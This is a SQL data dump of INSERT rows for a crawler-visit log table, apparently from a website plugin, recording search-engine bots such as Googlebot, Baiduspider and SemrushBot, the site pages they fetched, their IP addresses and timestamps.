INSERT INTO `ey_weapp_spider_visit` VALUES ('99081', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/city/changzhoushi.html', '220.181.108.93', '1662482579', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95287', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bcxw/list_19_9/', '114.119.151.153', '1660726228', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95460', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/47_2.html', '185.191.171.15', '1660832016', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95268', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/338.html', '185.191.171.24', '1660716444', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95492', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/172.html', '207.46.13.59', '1660854356', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95497', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_24.html', '185.191.171.18', '1660856382', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95495', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_17.html', '116.179.32.198', '1660855767', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95265', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/258.html', '185.191.171.7', '1660713018', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95266', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_12.html', '185.191.171.45', '1660713775', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95269', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.112', '1660716954', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99083', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_30/', '185.191.171.4', '1662483317', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99084', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.112', '1662483350', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95242', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/4.html', '66.249.79.112', '1660699517', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95247', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_6/', '185.191.171.14', '1660702108', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95245', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/177.html', '66.249.79.112', '1660701444', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95246', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/sz.html', '114.119.151.155', '1660702001', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95510', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/danzhoushi.html', '114.119.151.153', '1660861377', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95251', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/tuobengal/', '114.119.151.155', '1660704034', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95249', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/381.html', '114.119.151.155', '1660703111', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99085', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/city/anhuisheng.html', '116.179.32.90', '1662483472', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95177', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/446.html', '216.244.66.194', '1660655474', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99089', '99', 'labjs.pro/bot', '/', '176.102.12.236', '1662487473', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99196', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/491.html', '185.191.171.45', '1662499177', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99198', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/105.0.5195.102 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1662501329', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99203', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.183.224.91', '1662506860', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99201', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.63', '1662503054', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99191', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/119.html', '116.179.32.112', '1662495893', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99092', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bcxw/list_19_4/', '162.55.86.60', '1662487488', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99095', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bengche/', '162.55.86.60', '1662487498', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99130', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/250.html', '162.55.86.60', '1662487639', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99188', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/71.html', '66.249.79.108', '1662494444', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99129', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/166.html', '162.55.86.60', '1662487634', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99120', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/68.html', '162.55.86.60', '1662487598', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99119', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/66.html', '162.55.86.60', '1662487592', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99101', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljwd/list_20_6/', '162.55.86.60', '1662487518', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99182', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1662489725', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99155', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/list_3_2/', '162.55.86.60', '1662487745', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99152', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/497.html', '162.55.86.60', '1662487736', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99162', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/list_2_3/', '162.55.86.60', '1662487776', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99180', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/city/shanghai.html', '220.181.108.105', '1662488941', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99175', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.108', '1662488694', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99167', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/bc/', '66.249.79.110', '1662488040', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99165', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/yqal/list_21_2/', '162.55.86.60', '1662487789', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99166', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/yqal/list_21_3/', '162.55.86.60', '1662487797', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99209', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/', '114.119.151.153', '1662511881', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99202', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/case/241.html', '157.55.39.153', '1662505416', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99204', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1662508773', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94916', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/109.html', '220.181.108.102', '1660538908', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94917', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_22/', '185.191.171.20', '1660538936', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94918', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/201.html', '116.179.32.30', '1660539106', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99208', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/gqal/', '157.55.39.153', '1662510966', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99210', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/135.html', '185.191.171.3', '1662512757', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94903', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/372.html', '66.249.79.110', '1660532971', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99211', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/city/jiangsusheng.html', '116.179.32.235', '1662512789', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94891', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/35.html', '220.181.108.177', '1660524178', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94213', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1660148576', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94401', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.93', '1660260104', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94217', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1660149633', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94225', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_67/', '185.191.171.19', '1660151774', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94226', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yulin.html', '114.119.151.155', '1660151945', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94233', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/202.html', '216.244.66.194', '1660155428', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94236', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/410.html', '66.249.79.110', '1660157981', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94235', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/248.html', '66.249.79.112', '1660157110', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94246', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/102.html', '185.191.171.18', '1660165450', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94272', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '42.194.242.213', '1660176281', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94264', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/59.html', '66.249.79.112', '1660173789', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94249', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/124.html', '216.244.66.194', '1660167059', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94248', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/82.html', '185.191.171.16', '1660167050', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94250', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case', '185.191.171.3', '1660167086', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94260', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/418.html', '207.46.13.52', '1660172662', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94252', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/423.html', '216.244.66.194', '1660167965', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94253', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/products/292.html', '207.46.13.179', '1660168966', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94256', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/44_7.html', '185.191.171.4', '1660170039', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94255', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_2.html', '185.191.171.12', '1660170007', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94258', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.183.224.90', '1660170767', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94293', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/248.html', '66.249.79.110', '1660186194', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94296', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.135', '1660186597', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94407', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/261.html', '216.244.66.194', '1660262285', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94421', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/92.html', '185.191.171.3', '1660268875', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94867', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/194.html', '185.191.171.8', '1660510819', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94856', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/222.html', '216.244.66.194', '1660506185', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94864', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/82.html', '66.249.79.112', '1660509782', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95091', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.203', '1660619492', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95093', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660620154', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95105', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/429.html', '157.55.39.41', '1660625738', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95117', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/228.html', '185.191.171.19', '1660628568', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95128', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_11.html', '220.181.108.156', '1660632123', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95140', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/about/', '220.181.108.102', '1660638102', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95136', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_5.html', '116.179.32.142', '1660635297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95133', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/361.html', '114.119.151.155', '1660633463', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95132', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/products/', '207.46.13.59', '1660633315', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95137', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_5.html', '116.179.32.172', '1660635309', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95138', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_10.html', '116.179.32.242', '1660636699', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95139', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_11.html', '185.191.171.41', '1660637077', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95145', '99', 'mozilla/5.0 (compatible; neevabot/1.0; +https://neeva.com/neevabot)', '/products/324.html', '100.26.127.17', '1660641303', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95188', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/248.html', '66.249.79.108', '1660661069', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95186', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/31_5.html', '185.191.171.21', '1660660241', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95157', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_33.html', '185.191.171.44', '1660647235', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95160', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/232.html', '66.249.79.112', '1660648612', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95168', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/75.html', '185.191.171.26', '1660653104', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95170', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/452.html', '207.46.13.215', '1660653688', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95171', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/', '116.179.32.51', '1660653720', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95213', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/4_9.html', '116.179.32.18', '1660674665', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95189', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/68.html', '114.119.151.155', '1660661477', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95192', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/142.html', '216.244.66.194', '1660662531', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95210', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_38/', '114.119.151.153', '1660673726', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95198', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/101.html', '116.179.32.229', '1660666813', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95201', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/101.html', '116.179.32.89', '1660668776', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95206', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_22.html', '116.179.32.80', '1660672702', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95208', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/261.html', '207.46.13.215', '1660672988', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95202', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/328.html', '66.249.79.108', '1660669240', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95207', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/114.html', '185.191.171.43', '1660672734', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95205', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '110.88.127.197', '1660671165', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95211', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/70.html', '66.249.79.112', '1660674378', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95214', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/375.html', '114.119.151.155', '1660675525', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95218', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_47/', '114.119.151.155', '1660678114', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95219', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/279.html', '185.191.171.8', '1660678256', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95222', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1660682141', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95220', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/44_2.html', '185.191.171.35', '1660678593', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95221', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/jbJxw', '220.181.108.157', '1660680589', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95225', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_33/', '116.179.32.12', '1660682553', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95304', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/84.html', '116.179.32.218', '1660738751', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95306', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.110', '1660740612', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95308', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_30/', '220.181.108.167', '1660740714', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95312', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/288.html', '185.191.171.37', '1660745132', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95314', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_22/', '185.191.171.34', '1660747238', '0');
